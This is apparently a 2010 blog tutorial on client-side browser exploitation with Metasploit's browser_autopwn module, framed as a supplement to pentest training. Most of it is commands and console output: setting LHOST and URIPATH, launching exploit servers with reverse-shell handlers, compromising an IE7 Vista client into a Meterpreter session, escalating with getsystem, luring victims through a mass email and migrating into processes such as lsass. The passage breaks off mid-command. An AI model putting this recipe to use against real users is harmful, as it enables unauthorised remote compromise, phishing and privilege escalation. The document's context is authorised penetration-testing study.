browser exploitation with metasploit 0
After talking with a few people who have done the SANS: SEC560 (GPEN) course and challenging the exam myself, one thing I felt that was missing regarding metasploit was the browser exploitation features. With pentesting and exploitation in general focusing on client-side attacks now for a while I thought the course could probably benefit from something like this for pentesting. First you’ll need to start up metasploit and load the server/browser_autopwn module:
=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 553 exploits - 264 auxiliary
+ -- --=[ 209 payloads - 23 encoders - 8 nops
=[ svn r9403 updated 3 days ago (2010.06.03)
msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
From here, the only option we need to change in order to get some basic functionality working is the LHOST option. Ofcourse, unless you want to type out the long+random URIPATH string, you might want to change that also. Once those options are set, we can also run the exploit:
msf auxiliary(browser_autopwn) > set URIPATH testing URIPATH => testing msf auxiliary(browser_autopwn) > set LHOST 192.168.0.22 LHOST => 192.168.0.22 msf auxiliary(browser_autopwn) > exploit [*] Auxiliary module execution completed [*] Starting exploit modules on host 192.168.0.22... [*] --- [*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp [*] Using URL: http://0.0.0.0:8080/90Yiozy7u9n [*] Local IP: http://192.168.0.22:8080/90Yiozy7u9n [*] Server started. [*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp [*] Using URL: http://0.0.0.0:8080/xGIjmqty [*] Local IP: http://192.168.0.22:8080/xGIjmqty [*] Server started. <- cut -> [*] Starting handler for windows/meterpreter/reverse_tcp on port 3333 [*] Starting handler for generic/shell_reverse_tcp on port 6666 [*] Started reverse handler on 192.168.0.22:3333 [*] Starting the payload handler... [*] Started reverse handler on 192.168.0.22:6666 [*] Starting the payload handler... [*] --- Done, found 15 exploit modules [*] Using URL: http://0.0.0.0:8080/testing [*] Local IP: http://192.168.0.22:8080/testing [*] Server started.
Now on our client we browse to the URL listed above as the ‘Local IP’. In this case it would be http://192.168.0.22:8080/testing. Once that is done, you can check the metasploit console window and you will see:
[*] Request '/testing' from 192.168.0.5:64865 [*] Request '/testing?sessid=V2luZG93czpWaXN0YTp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6Ny4wOg%3d%3d' from 192.168.0.5:64865 [*] JavaScript Report: Windows:Vista:undefined:en-us:x86:MSIE:7.0: [*] Responding with exploits [*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.0.5:64866... [*] Sending stage (748032 bytes) to 192.168.0.5 [*] Meterpreter session 1 opened (192.168.0.22:3333 -> 192.168.0.5:64867) at Sun Jun 06 12:25:01 +1000 2010 msf auxiliary(browser_autopwn) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter vistavm\testadmin @ VISTAVM 192.168.0.22:3333 -> 192.168.0.5:64867 msf auxiliary(browser_autopwn) > sessions -i 1 [*] Starting interaction with 1... meterpreter > use priv Loading extension priv...success. meterpreter > getsystem ...got system (via technique 1). meterpreter > idletime User has been idle for: 2 mins 46 secs meterpreter >
Now, how would you go about getting clients/victims to visit this in a pentest? Doing an organisation wide mass email is probably the easiest way. Also if you start the msfconsole session as root you can change the server destination port to port 80 provided nothing else is listening on that port.
You will also likely want to migrate to a more stable process within meterpreter incase the user closes down their browser. Under meterpreter check for stable running processes (for example, winlogon or lsass) and run ‘migrate